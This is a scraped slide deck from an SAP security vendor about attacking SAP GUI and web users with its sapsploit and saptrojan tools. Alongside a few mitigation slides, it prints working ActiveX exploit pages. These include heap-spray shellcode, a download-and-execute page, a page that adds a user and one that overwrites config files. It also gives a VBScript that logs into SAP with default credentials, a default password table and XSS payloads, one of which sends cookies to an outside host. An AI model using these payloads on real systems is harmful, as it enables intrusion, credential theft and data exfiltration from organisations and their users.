SlideShare a Scribd company logo

Attacking SAP users with sapsploit

ERPScan
ERPScan

Business applications like ERP, CRM, SRM, and others are one of the major topics in the field of computer security as these applications store business data and any vulnerabilities in these applications can cause a significant monetary and reputational loss or even stoppage of business. Nonetheless, people still do not pay much attention to the technical side of SAP security. As for SAP, we saw different vulnerabilities at all levels (architecture, software vulnerabilities and implementation).

Software
1 of 52
Download to read offline
Invest  in  security   to  secure  investments   SAP  Security:A-acking  SAP   users  with  sapsploit     Alexander  Polyakov.    
About  ERPScan   •  The   only   360-­‐degree   SAP   Security   soluAon   -­‐   ERPScan   Security   Monitoring  Suite  for  SAP   •  Leader  by  the  number  of  acknowledgements  from  SAP  (  150+  )   •  60+  presenta=ons  key  security  conferences  worldwide   •  25  Awards  and  nomina=ons   •  Research  team  -­‐  20  experts  with  experience  in    different  areas   of  security   •  Headquarters  in  Palo  Alto  (US)  and  Amsterdam  (EU)       2  
Intro     •  Business  applica,ons  like  ERP,  CRM,  SRM  and  others  are  one  of   the  major  topics  within  the  field  of  computer  security  as  these   applica,ons  store  business  data  and  any  vulnerability  in  these   applica,ons  can  cause  a  significant  monetary  loss  or  even   stoppage  of  business.     Nonetheless  people  sAll  do  not  give  much  a-enAon  to  the   technical  side  of  SAP  security.         3  
Main  problems  in  ERP  security     •  ERP  systems  have  a  complex  structure  (complexity  kills   security  )     •  Mostly  available  inside  a  company  (closed  world)     •  Contain  many  different  vulnerabiliAes  in  all  the  levels  from     •  network  to  applicaAon     •  Rarely  updated  because  administrators  are  scared  they  can  be   broken  during  updates     4  
SAP  Security     5  
SAP  Security:  Pentester’s  view     AbstracAon  Levels     •  Network   •  OS   •  Database   •  AplicaAon(BASIS)   •  AddiAonal  services  (igs,j2ee  telnet)     •  Client-­‐side     6  
SAP  Security:  Pentester’s  view     •  Very  Very  Very  Very  Very  huge  area   •  Impossible  to  describe  it  all  in  one  hour     •  You  can  start  with:     –  Sap  security  Guides  and  Sap  security  notes   –  My  previous  talk  “Some  notes  on  SAP  security”  from  Troopers  2010  •   –  Mariano  Nunez  Di  Croce  presentaAons  from  Black  Hat  and  HITB     7  
Real  life  situa=on:     During  one  of  our  sap  penetra,on  tests  we  found  that  SAP   infrastructure  was  securely  separated  from  users  network  so  one  of   the  possible  ways  to  aFack  this  network  was  geGng  access  to   users  worksta,ons  which  can  get  access  to  SAP  servers     8  
Why  aQack  Users     •  Users  are  less  secure     •  There  are  thousands  SAP  users  in  one  company     •  U  can  a-ack  them  even  if  Server  is  fully  secured     •  U  can  a-ack  them  from  outside     •  U  can  use  them  as  proxy  for  a-acking  servers     •  They  are  stupid  )     9  
AQacking  SAP  Users   SAP  users  may  connect  using:   •  SAPGUI   •  JAVAGUI   •  WEBGUI  (Browser)   •  RFC     •  ApplicaAons  such  as  VisualAdmin,  Mobile  client  and  many  many   other  stufff   10  
SAP  GUI  overview   •  SAP  GUI  —  Common  applicaAon  for  connecAng  to  SAP   •  Very  widespread  almost  at  any  SAP  workstaAon  in  a  company   (hundreds  or  thousands  of  installaAons)   •  Don’t  have  simple  autoupdate  (instead  of    MS  products,  AV,   flash  etc)   •  Not  so  popular  usually  never  updated  or  updated  very  rarely   11  
12   AFacking  SAPGUI  clients  
Common  Vulnerabili=es   •  SAP  LPD  overflows   •  AcAveX  overflows   •  Other  AcAveX  vulnerabiliAes   •  Sap  shortcuts   •  Data  sniffing   13  
SAP  LPD  Vulnerabili=es   •  Components  for  enabling  printer  opAons  in  SAP   •  MulAple  buffer  overflow  vulnerabiliAes  by  Luigi  Auriemma  (  4   feb  2008)   •  VulnerabiliAes  were  found  SAPlpd  protocol     •  It  allowed  an  a-acker  to  receive  the  full  remote  control  over   the  vulnerable  system   •  h-p://aluigi.altervista.org/adv/saplpdz-­‐adv.txt   14   According  to  our  sta,s,cs  of  security  assessments  in  2009  about   30%  of  worksta,ons  are  vulnerable    
SAP  LPD  Vulnerabili=es  in  details     •  There  are  thousands  of  workstaAons  in  a  company  so  you  have   a  great  chance  that  using  Metasploit  module  db_autopwn  you   can  exploit  somebody     15  
Ac=veX  Vulnerabili=es   •  There  are  about  1000  AcAveX  controls  installed  with  SAP  GUI   •  Any  of  them  can  potenAally  have  a  vulnerability   •  User  interacAon  is  needed.  (the  link  could  be  sent  by  e-­‐mail,   ICQ  ,o,tweet.)   •  The  vulnerable  component  will  be  executed  in  the  context  of  a   browser  of  a  vicAm  which  is  frequently  started  under  the   administraAve  rights   •  Using  social  engineering  scenarios  it  can  be  about  10-­‐50%  of   exploitaAon  depending  on  AcAveX  scenario  and  users     awareness   16  
Date   Vulnerable   Component Author Vulnerability Link 04.01.2007 rfcguisink  Mark  Litchfield   BOF h-p://www.ngssosware.com/advisories/high-­‐risk-­‐vulnerability-­‐in-­‐enjoysap-­‐ stack-­‐overflow/   04.01.2007 Kwedit  Mark  Litchfield BOF h-p://www.ngssosware.com/advisories/high-­‐risk-­‐vulnerability-­‐in-­‐enjoysap-­‐ stack-­‐overflow/ 07.11.2008 mdrmsap  Will  Dormann     BOF h-p://www.securityfocus.com/bid/32186/info 07.01.2009 Sizerone  Carsten  Eiram BOF h-p://www.securityfocus.com/bid/33148/info 31.03.2009 WebWiewer3D  Will  Dormann     BOF h-p://www.securityfocus.com/bid/34310/info 15.04.2009 Kwedit Carsten  Eiram Insecure  Method h-p://secunia.com/secunia_research/2008-­‐56/ 08.06.2009 Sapirrfc  Alexander  Polyakov   BOF h-p://dsecrg.com/pages/vul/show.php?id=115 28.09.2009 WebWiewer3D Alexander  Polyakov   Insecure  Method h-p://dsecrg.com/pages/vul/show.php?id=143   28.09.2009 WebWiewer2D Alexander  Polyakov   Insecure  Method h-p://dsecrg.com/pages/vul/show.php?id=144    07.10.2009 VxFlexgrid  Elazar  Broad  ,    Alexander  Polyakov   BOF h-p://dsecrg.com/pages/vul/show.php?id=117 23.03.2010 BExGlobal Alexey  Sintsov   Insecure  Method h-p://dsecrg.com/pages/vul/show.php?id=164 ???  DSECRG-­‐09-­‐045   Alexander  Polyakov,  Alexey  Troshichev     Insecure  Method Later  or  dsecrg.com  ???  DSECRG-­‐09-­‐069  Alexey  Sintsov  (DSecRG) Memory  CorrupAon Later  or  dsecrg.com  ???  DSECRG-­‐09-­‐070  Alexey  Sintsov  (DSecRG) Format  String Later  or  dsecrg.com  ???  DSECRG-­‐00173  Alexander  Polyakov  (DSecRG) Insecure  Method Later  or  dsecrg.com Ac=veX  Vulnerabili=es  hist.   17  
Ac=veX  Buffer  Overflows     •  The  first  example  was  found  by  Mark  Litchfield  in  January,  2007   •  Vulnerable  components:    kwedit    and    rfcguisink   •  Later  were  found  more  BOF  in  SAP  AcAveX  controls   •  Successful    exploitaAon  =  full  remote  control   •  For  most  of  vulnerabiliAes  exploits  available     18  
Ac=veX  Buffer  Overflows  in  the  3rd  party   components   •  15.11.2007     –  Elazar  Broad  published  BOF  exploit  for    ComponentOne  FlexGrid  AcAveX   –  Vendor  did  not  release  any  patches   •  26.11.2008   –  ERPScan  found  this  component  to  be  installed  by  default  withSAP  GUI   and  with  SAP  Business  One  Client     –  We  posted  it  to  SAP   –  SAP  added  killbit  recommendaAons  for  SAP  GUI  (1092631  )   •  08.07.2009   –  SAP  released  patch  for  SAP  Business  One  Client  (sapnote  1327004  )     19  
Ac=veX  Buffer  Overflows    in  3rd  party   components  (Example)   Using  vulnerability  in  one  FlexGrid  and  heap  spray  exploit  a-acker  can  run  calc.exe  for  example:       <HTML> <HEAD> <META http-equiv=Content-Type content="text/html; charset=windows-1252"> <script language="JavaScript" defer> var sCode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" + "%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" + "%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" + "%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" + "%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" + "%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" + "%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" + "%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" + "%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" + "%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" + "%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" + "%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" + "%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" + "%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" + "%u652E%u6578%u9000"); var sSlide = unescape("%u9090%u9090"); var heapSA = 0x0c0c0c0c; function tryMe() {var buffSize = 5200; var x = unescape("%0c%0c%0c%0c"); while (x.length<buffSize) x += x; x = x.substring(0,buffSize); 20  
Advanced  Ac=veX  AQacks     •  Buffer  overflows  is  not  the  only  one  vulnerability  in  AcAveX   components.   •  There  are  AcAveX  controls  that  can:   –  Download  and  exec  executables  such  as  Trojans   –  Run  any  file/command   –  Read/Write    files   –  Overwrite/Delete  files   –  Connect  to  SAP  servers     21  
Download  and  exec  executables     A-acker  can  upload  trojan  on  a  vicAm’s  PC  and  save  it  in  autorun.   <html> <title>DSecRG SAP ActiveX download and execute</title> <object classid="clsid:2137278D-EF5C-11D3-96CE-0004AC965257" id=‘test'></object> <script language='Javascript'> function init() { var url = "http://172.16.0.1/notepad.exe"; var FileName='/../../../../../../../../../Documents and Settings/All Users/Start menu/Programs/Startup/notepad.exe'; test.Comp_Download(url,FileName); </script> DSecRG </html>       22  
Run  any  programm      A-acker  can  run  any  program,  such  as  add  any  user  to  vicAm’s  PC       <html> <title>*DSecRG* Add user *DSecRG*</title> <object classid="clsid:A009C90D-814B-11D3- BA3E-080009D22344" id=‘test'></object> <script language='Javascript'> function init() { test.Execute("net.exe","user DSecRG p4ssW0rd /add“ ,"d: windows",1,"",1); } init(); </script> DSecRG </html>   23  
Run  any  programm     •  A-acker  can  overwrite  any  file  such  as  SAP  configuraAon  file     <HTML> <title>*DSecRG* delete config<title> <BODY> <object id=test classid="clsid:{A76CEBEE-7364-11D2- AA6B-00E02924C34E}"></object> <SCRIPT> function init() { File = "c:WINDOWSsaplogon.ini" test.SaveToSessionFile(File) } Init(); </SCRIPT> </BODY> </HTML>       24  
Connect  to  SAP  servers   There  are  also  some  a-acks  that  don’t  use  any  vulnerabiliAes   •  Many  AcAveX  execute  different  SAP  funcAons  such  as   connecAng  to  server     •  Combining  those  methods  an  a-acker  can  construct  any  a-ack     •  In  our  example  we  use  SAP.LogonControl  for  connecAon  using   RFC  protocol  and  SAP.TableFactory  for  selecAon  data  from  the   tables   •  Generated    exploit  connects  to  SAP  server  and  selects  criAcal   data  from  SAP  server     25  
Connect  to  SAP  server     Sub Main() Set LogonControl = CreateObject("SAP.LogonControl.1") Set funcControl = CreateObject("SAP.Functions") Set TableFactoryCtrl = CreateObject("SAP.TableFactory.1") call R3Logon funcControl.Connection = conn call R3RFC_READ_TABLE(“KNA1") conn.Logoff MsgBox " Logged off from R/3! " End Sub Sub R3Logon() Set conn = LogonControl.NewConnection conn.ApplicationServer = "172.16.1.14" ' IP or DNS-Name of the R/3 application server conn.System = "00" ' System ID of the instance, usually 00 conn.Client = "000" ' opt. Client number to logon to conn.Language = "EN" ' opt. Your login language conn.User = “SAP*" ' opt. Your user id conn.Password = “06071992" ' opt. Your password eQUERY_TAB.Value = pQueryTab ' pQueryTab is the R/3 name of the table TOPTIONS.AppendRow ' new item line 'TOPTIONS(1,"TEXT") = "MANDT EQ '000'" If RFC_READ_TABLE.Call = True Then If TDATA.RowCount > 0 Then MsgBox TDATA(1, "WA") Else MsgBox "Call to RFC_READ_TABLE successful! No data found" End If Else MsgBox "Call to RFC_READ_TABLE failed!" End If End Sub 26  
Ac=veX  AQacks:  sapsploit     sapsploit  -­‐  tool  for  automa,c  sap  clients  exploita,on  using  all  kind   of  Ac,veX  vulnerabili,es.    developed  by  ERPScan  researchers:   Alexander  Polyakov  (@sh2kerr)and  Alexey  Sintsov(@asintsov).   •  Perl  generator  for  evil  html  page   •  Modular  structure   •  Collect  all  described  exploits   •  2  Payloads  (exec  command  or  upload  saptrojan)   •  jitspray  exploit  versions  by  Alexey  Sintsov  in  (beta)   27  
Ac=veX  AQacks:  sapsploit     You  Got  access  to  the  client’s  OS  what  then?   •  Obtain  informaAon  about  SAP  servers   •  Connect  to  SAP  servers  using  default  or  stolen  credenAals   •  Obtain  criAcal  data  from  SAP  server   •  Transmit  it  securely  to  a-acker   •  Something  more   28  
Saptrojan:  Gathering    info   •  All  connecAons  to  SAP  servers  stored  in  configuraAon  file   •  By  default:   –  C:WINDOWSsaplogon.ini   –  D:WINDOWSsaplogon.ini   –  C:WINNTsaplogon.ini   –  D:WINNTsaplogon.ini   •  From  this  file  we  get:   –  IP  address   –  Instance  ID   –  SID   –  Default  Client   29  
USER   PASSWORD   CLIENT   SAP*   06071992   000  001  066   DDIC   19920706   000  001   TMSADM   PASSWORD   000   SAPCPIC   ADMIN   000  001   EARLYWATCH   SUPPORT   066   Saptrojan:  Connec=ng  to  SAP   •  Try  default  passwords   •  Try  to  read  them  from  sapshortcuts  (filetype  *.sap  on  desktop   or  sapworkdir)     •  Try  to  bruteforce  (rfc  brute  is  not  locking  before  6.20)   •  Try  to  bruteforce  2  minutes  before  midnight  ☺  (login/ failed_user_auto_unlock)   •  Or  upload  keylogger     30  
•  We  can  simply  sniff  passwods  if  we  are  on  vicAms  pc     –  Using  keylogger  (u  can  upload  any  one  using  downl&exec  payload)     –  By  sniffing  traffic  (data  encrypted  by  default  )   •  We  can  turn  off  data  encrypAon  using  variable   TDW_NOCOMPRESS=1   •  Aser  it  we  can  sniff  passwords  locally  or  by  arpspoof  if  we  in  the   same  segment   •  This  funcAon  is  included    in  saptrojan   31   Saptrojan:  Some  fun    
•  Aser  successefull  connecAon  trying  to  download  criAcal   informaAon:   –  Table  usr02  –  all  passwords  (unfortunately  in  RAW  format)   –  Table  KNA1  –  table  with  data  about  all  Customers     –  Table  LFA1  –  table  with  vendor  master  data     –  Anything  else  u  want  ☺     All  this  informaAon  well  be  presented  to  TOP’s  to  show  the  criAcality  of   vulnerabiliAes         32   Saptrojan:  Downloading  Cri=cal  info    
•  Aser  successefull  download  we  thansfer  it  to  a-ackers  server   (sapsploit):   –  Transfer  is  making  using  HTTP  post  requests   –  All  informaAon  is  encrypted  to  prevent  any  possible  DLP  soluAons   –  Decrypts  on  the  server  site  and  saves       JUST  ONE  CLICK  FROM  INSTALLING  SAPSPLOIT  TO  GETTING   CRITICAL  INFORMATION  FROM  INSIDE  THE  COMPANY  THAT  USE   SAP.   33   Saptrojan:  Uploading  it  to  aQacker’s  sever    
saptrojan  -­‐  tool  for  gaining  addi,onal  informa,on  from  users   worksta,ons  and  aFack  SAP  servers.  developed  by  ERPScan   researchers:  Alexander  Polyakov  and  Alexey  Sintsov.   •  Wri-en  on  vbs  and  use  SAP  AcAveX  controls.   •  Connects  to  the  SAP  server  using  different  methods   •  Download  criAcal  informaAon     •  Transfer  it  encrypted   34   Ac=veX  AQacks:  saptrojan  
•  Many  workstaAons  (about  50%)  sAll  run  on  SAPGUI  6.4.  Don’t   use  SAPGUI  6.4    (there  is  no  patches  for  some  vulns  )   •  Patch  SAPLPD   •  Patch  SAPGUI  7.1  for  at  least  sp10  or  set  killbits     •  Don’t  click  on  untrusted  links  ))   •  Don’t  store  password  in  shortcuts  (HKCUSoswareSAP SAPShortcutSecurity  EnablePassword=0)   •  Securely  use    shortcuts   h-p://www.basis2048.com/sap-­‐gui-­‐for-­‐windows-­‐security-­‐ execuAon-­‐of-­‐sapshortcuts-­‐1344.htm   35   Mi=ga=ons    
36   SAPSPLOIT  &  SAPTROJAN   DEMO  
Mi=ga=ons     •  Many  workstaAons  (about  50%)  sAll  run  on  SAPGUI  6.4.  Don’t   use  SAPGUI  6.4    (there  is  no  patches  for  some  vulns  )   •  Patch  SAPLPD   •  Patch  SAPGUI  7.1  for  at  least  sp10  or  set  killbits     •  Don’t  click  on  untrusted  links  ))   •  Don’t  store  password  in  shortcuts  (HKCUSoswareSAP SAPShortcutSecurity  EnablePassword=0)   •  Securely  use    shortcuts   h-p://www.basis2048.com/sap-­‐gui-­‐for-­‐windows-­‐security-­‐ execuAon-­‐of-­‐sapshortcuts-­‐1344.htm   37  
AFacking  WEB  clients   38  
WEB  Clients  AQacks   •  Many  SAP  systems    transferred  to  the  web     •  For  example  SAP  CRM,  SRM,  Portal   •  There  are  also  many  custom  applicaAons   •  All  those  applicaAons  store  many    vulnerabiliAes   •  Despite  that  vulnerabiliAes  are  found  in  WEB  servers,  most  of   the  a-acks  are  targeted  at  SAP  clients.      Thus,  speaking  about  safety  of  SAP-­‐clients  it  is  necessary  to   men,on  typical  client-­‐side  vulnerabili,es  in  web  applica,ons   39  
•  Linked  XSS   •  Phishing   •  XSRF   •  HTML  InjecAon  and  Stored  XSS   Typical  AQacks  on  SAP  WEB  Clients     All  of  those  aFacks  are  possible  in  SAP   40  
There  was  another  real  life  example.   One  company  uses  SRM  system  –  supplier  resource  management   system.  This  system  was  developed  for  automated  tender  system.   Any  company  (and  not  only  :)   Can  register  in  that  system  and  publish  a  tender  informaAon.  This   ApplicaAon  is  visible  from  outside  using  web       You  don’t  believe  me  ?  )   41  
•  SAP  SRM  use  cFolders  web-­‐based  applicaAon  for  collaboraAve   share  of  the  informaAon   •  cFolders  is  integrated  to  SAP  ECC,  PLM,SRM,KM  and  cRooms     •  If  one  user  can  get  access  to  another  or  to  administrators   console  it  is  a  criAcal  vulnerability     •  There  are  many  ways  to  do  this     •  So  lets  Begin!!!!   AQacking    SAP  SRM   42  
Start  with  simple  Phishing     •  Using    XSS  (ERPSCAN-­‐08-­‐038)  it  is  possible  to  steal  a  user’s   creden=als   •  It  is  not  a  simple  XSS  because  it  is  found  on  login  page  before   auth.   •  IT  injects  code  into  page  source  acer  forms  of  input  of  a  login   and  a  password   •  So  we  can  rewrite  standard  entry  fields  with  fake  that  will   transfer  the  data  entered  by  a  user,  on  a  a-acker’s  site   •  Need  some  Ame  to  make  it  clear  ))   43  
Phishing     44  
Con=nuing  with  Linked  XSS     •  There  are  so  many  XSS  vulnerabiliAes  in  SAP……..     •  Found  them  in       –  h-p://erpscan.com     –  h-p://onapsis.com   –  h-p://cybcec.com   +  may  talk  from  troopers10         45  
Con=nue  with  XSRF   •  SAP  MMR  accessable  from  internet  vulnerable  to  DOS  a-ack  by   sending  a  mulAple  packets  with  performance  test  request.   (ERPSCAN-­‐00125  previosly  reported)   •  In  new  versions  MMR  needs  auth   •  We  can  simply  send  URL  to  administrator  and  run  DOS  a-ack       46  
•  Much  more  interesAng  and  cri=cal  vulnerability  then  linked   XSS     •  Cfolders  engine  allows  to  create  HTML  documents  containing   any  data  and  to  place  them  in  shared  folders   •  Any  authen=cated  user  (supplier)  can  inject  malicious  code  in   the  portal  page   •  In  simple  scenario  we  can  put  cookie  sniffer  into  shared  folder   and  get  access  to  purchaser  session.   •  More  advanced  scenario  –  Insert  Sapsploit  into  HTML   document  and  obtain  shell  access  :)     <html><script>document.location.href='http:// erpscan.com/?'+document.cookie;</script></html> Stored  XSS   47  
Stored  XSS  part  2  (more  aQacks)   Code  injec=on  in    Bookmark  crea=on  op=on   •  He  can  inject  javascript  code  into  Bookmark  field  on  the  page   h-ps://[site]/sap/bc/bsp/sap/cfx_rfc_ui/hyp_de_create.htm   example  link  value:  h-p://test.com"   onmouseover="alert(document.cookie)">   Then  when  administrator  browses  for  user  folders  script  will   execute.     48  
Stored  XSS  part  2  (more  aQacks)   Code  injec=on    document  uploading  area   •  A  user  can  create  a  document  with  the  file  name  including   javascript  code.   example  filename  value:    aaa"><script>alert()</script>.doc     So  using  this  vulnerabiliAes  a  user  can  steal  cookie  or  upload   sapsploit  like  he  did  in  the  first  example.   49  
50   ATTACKING  WEB  CLIENTS   DEMO  
•  ERP  systems  such  as  SAP  is  one  of  the  main  business  element  of   any  company   •  In  case  of  SAP  we  saw  a  different  vulnerabili=es  at  all   presenta=on  levels   •  Problems  are  with  architecture,  socware  vulnerabiliAes  and   implementa=on   •  SAP  HAS  soluAons  for  almost  all  possible  security  problems   (patches,  guides)   •  The  number  of  these  problems  is  so  huge  and  specific     •  Keep  in  mind  that  it  is  be-er  to  start  thinking  about  security   before  than  aser    implementaAon.   If  u  can  have  a  special  skilled  department  and  work  24/7    –  do   this.  If  not  –  keep  it  to  professionals   Conclusion   51  
web:  www.erpscan.com         e-­‐mail:  info@erpscan.com,  sales@erpscan.com   52  

Recommended

Practical SAP pentesting workshop (NullCon Goa)
Practical SAP pentesting workshop (NullCon Goa)Practical SAP pentesting workshop (NullCon Goa)
Practical SAP pentesting workshop (NullCon Goa)ERPScan
 
Practical SAP pentesting (B-Sides San Paulo)
Practical SAP pentesting (B-Sides San Paulo)Practical SAP pentesting (B-Sides San Paulo)
Practical SAP pentesting (B-Sides San Paulo)ERPScan
 
5 real ways to destroy business by breaking SAP applications
5 real ways to destroy business by breaking SAP applications5 real ways to destroy business by breaking SAP applications
5 real ways to destroy business by breaking SAP applicationsERPScan
 
Sap penetration testing_defense_in_depth
Sap penetration testing_defense_in_depthSap penetration testing_defense_in_depth
Sap penetration testing_defense_in_depthIgor Igoroshka
 
Sap security – thinking with a hacker’s hat
Sap security – thinking with a hacker’s hatSap security – thinking with a hacker’s hat
Sap security – thinking with a hacker’s hatn|u - The Open Security Community
 
Penetration Testing SAP Systems
Penetration Testing SAP SystemsPenetration Testing SAP Systems
Penetration Testing SAP SystemsOnapsis Inc.
 
SAP Business Objects Attacks
SAP Business Objects AttacksSAP Business Objects Attacks
SAP Business Objects AttacksOnapsis Inc.
 
Assess and monitor SAP security
Assess and monitor SAP securityAssess and monitor SAP security
Assess and monitor SAP securityERPScan
 

Recommended

Practical SAP pentesting workshop (NullCon Goa)
Practical SAP pentesting workshop (NullCon Goa)Practical SAP pentesting workshop (NullCon Goa)
Practical SAP pentesting workshop (NullCon Goa)ERPScan
 
Practical SAP pentesting (B-Sides San Paulo)
Practical SAP pentesting (B-Sides San Paulo)Practical SAP pentesting (B-Sides San Paulo)
Practical SAP pentesting (B-Sides San Paulo)ERPScan
 
5 real ways to destroy business by breaking SAP applications
5 real ways to destroy business by breaking SAP applications5 real ways to destroy business by breaking SAP applications
5 real ways to destroy business by breaking SAP applicationsERPScan
 
Sap penetration testing_defense_in_depth
Sap penetration testing_defense_in_depthSap penetration testing_defense_in_depth
Sap penetration testing_defense_in_depthIgor Igoroshka
 
Sap security – thinking with a hacker’s hat
Sap security – thinking with a hacker’s hatSap security – thinking with a hacker’s hat
Sap security – thinking with a hacker’s hatn|u - The Open Security Community
 
Penetration Testing SAP Systems
Penetration Testing SAP SystemsPenetration Testing SAP Systems
Penetration Testing SAP SystemsOnapsis Inc.
 
SAP Business Objects Attacks
SAP Business Objects AttacksSAP Business Objects Attacks
SAP Business Objects AttacksOnapsis Inc.
 
Assess and monitor SAP security
Assess and monitor SAP securityAssess and monitor SAP security
Assess and monitor SAP securityERPScan
 
Cyber-attacks to SAP Systems
Cyber-attacks to SAP SystemsCyber-attacks to SAP Systems
Cyber-attacks to SAP SystemsOnapsis Inc.
 
All your SAP passwords belong to us
All your SAP passwords belong to usAll your SAP passwords belong to us
All your SAP passwords belong to usERPScan
 
If I want a perfect cyberweapon, I'll target ERP - second edition
If I want a perfect cyberweapon, I'll target ERP - second editionIf I want a perfect cyberweapon, I'll target ERP - second edition
If I want a perfect cyberweapon, I'll target ERP - second editionERPScan
 
The latest changes to SAP cybersecurity landscape
The latest changes to SAP cybersecurity landscapeThe latest changes to SAP cybersecurity landscape
The latest changes to SAP cybersecurity landscapeERPScan
 
SAP security landscape. How to protect(hack) your(their) big business
SAP security landscape. How to protect(hack) your(their) big businessSAP security landscape. How to protect(hack) your(their) big business
SAP security landscape. How to protect(hack) your(their) big businessERPScan
 
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP ForensicsOnapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP ForensicsOnapsis Inc.
 
SAP SDM Hacking
SAP SDM HackingSAP SDM Hacking
SAP SDM HackingERPScan
 
Attacks to SAP Web Applications: Your crown jewels online (BlackHat DC)
Attacks to SAP Web Applications: Your crown jewels online (BlackHat DC) Attacks to SAP Web Applications: Your crown jewels online (BlackHat DC)
Attacks to SAP Web Applications: Your crown jewels online (BlackHat DC)Onapsis Inc.
 
Attacking SAP Mobile
Attacking SAP MobileAttacking SAP Mobile
Attacking SAP MobileERPScan
 
How Hackers can Open the Safe and Take the Jewels
How Hackers can Open the Safe and Take the JewelsHow Hackers can Open the Safe and Take the Jewels
How Hackers can Open the Safe and Take the JewelsOnapsis Inc.
 
SAP (in)security: New and best
SAP (in)security: New and bestSAP (in)security: New and best
SAP (in)security: New and bestERPScan
 
Blended Web and Database Attacks on Real Time In-memory Platforms
Blended Web and Database Attacks on Real Time In-memory PlatformsBlended Web and Database Attacks on Real Time In-memory Platforms
Blended Web and Database Attacks on Real Time In-memory PlatformsOnapsis Inc.
 
Assessing and Securing SAP Solutions
Assessing and Securing SAP SolutionsAssessing and Securing SAP Solutions
Assessing and Securing SAP SolutionsERPScan
 
Preventing Vulnerabilities in SAP HANA based Deployments
Preventing Vulnerabilities in SAP HANA based DeploymentsPreventing Vulnerabilities in SAP HANA based Deployments
Preventing Vulnerabilities in SAP HANA based DeploymentsOnapsis Inc.
 
If I want a perfect cyberweapon, I'll target ERP
If I want a perfect cyberweapon, I'll target ERPIf I want a perfect cyberweapon, I'll target ERP
If I want a perfect cyberweapon, I'll target ERPERPScan
 
Incident Response and SAP Systems
Incident Response and SAP SystemsIncident Response and SAP Systems
Incident Response and SAP SystemsOnapsis Inc.
 
Dissecting and Attacking RMI Frameworks
Dissecting and Attacking RMI FrameworksDissecting and Attacking RMI Frameworks
Dissecting and Attacking RMI FrameworksOnapsis Inc.
 
Business breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERPBusiness breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERPERPScan
 
Practical pentesting of ERPs and business applications
Practical pentesting of ERPs and business applicationsPractical pentesting of ERPs and business applications
Practical pentesting of ERPs and business applicationsERPScan
 
Securing SAP in 5 steps
Securing SAP in 5 stepsSecuring SAP in 5 steps
Securing SAP in 5 stepsERPScan
 
Vanden Boeynants kreeg schouderklopje van VS
Vanden Boeynants kreeg schouderklopje van VSVanden Boeynants kreeg schouderklopje van VS
Vanden Boeynants kreeg schouderklopje van VSThierry Debels
 
OptinContacts: SAP Users List
OptinContacts: SAP Users ListOptinContacts: SAP Users List
OptinContacts: SAP Users ListRochelle williams
 

More Related Content

What's hot

Cyber-attacks to SAP Systems
Cyber-attacks to SAP SystemsCyber-attacks to SAP Systems
Cyber-attacks to SAP SystemsOnapsis Inc.
 
All your SAP passwords belong to us
All your SAP passwords belong to usAll your SAP passwords belong to us
All your SAP passwords belong to usERPScan
 
If I want a perfect cyberweapon, I'll target ERP - second edition
If I want a perfect cyberweapon, I'll target ERP - second editionIf I want a perfect cyberweapon, I'll target ERP - second edition
If I want a perfect cyberweapon, I'll target ERP - second editionERPScan
 
The latest changes to SAP cybersecurity landscape
The latest changes to SAP cybersecurity landscapeThe latest changes to SAP cybersecurity landscape
The latest changes to SAP cybersecurity landscapeERPScan
 
SAP security landscape. How to protect(hack) your(their) big business
SAP security landscape. How to protect(hack) your(their) big businessSAP security landscape. How to protect(hack) your(their) big business
SAP security landscape. How to protect(hack) your(their) big businessERPScan
 
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP ForensicsOnapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP ForensicsOnapsis Inc.
 
SAP SDM Hacking
SAP SDM HackingSAP SDM Hacking
SAP SDM HackingERPScan
 
Attacks to SAP Web Applications: Your crown jewels online (BlackHat DC)
Attacks to SAP Web Applications: Your crown jewels online (BlackHat DC) Attacks to SAP Web Applications: Your crown jewels online (BlackHat DC)
Attacks to SAP Web Applications: Your crown jewels online (BlackHat DC)Onapsis Inc.
 
Attacking SAP Mobile
Attacking SAP MobileAttacking SAP Mobile
Attacking SAP MobileERPScan
 
How Hackers can Open the Safe and Take the Jewels
How Hackers can Open the Safe and Take the JewelsHow Hackers can Open the Safe and Take the Jewels
How Hackers can Open the Safe and Take the JewelsOnapsis Inc.
 
SAP (in)security: New and best
SAP (in)security: New and bestSAP (in)security: New and best
SAP (in)security: New and bestERPScan
 
Blended Web and Database Attacks on Real Time In-memory Platforms
Blended Web and Database Attacks on Real Time In-memory PlatformsBlended Web and Database Attacks on Real Time In-memory Platforms
Blended Web and Database Attacks on Real Time In-memory PlatformsOnapsis Inc.
 
Assessing and Securing SAP Solutions
Assessing and Securing SAP SolutionsAssessing and Securing SAP Solutions
Assessing and Securing SAP SolutionsERPScan
 
Preventing Vulnerabilities in SAP HANA based Deployments
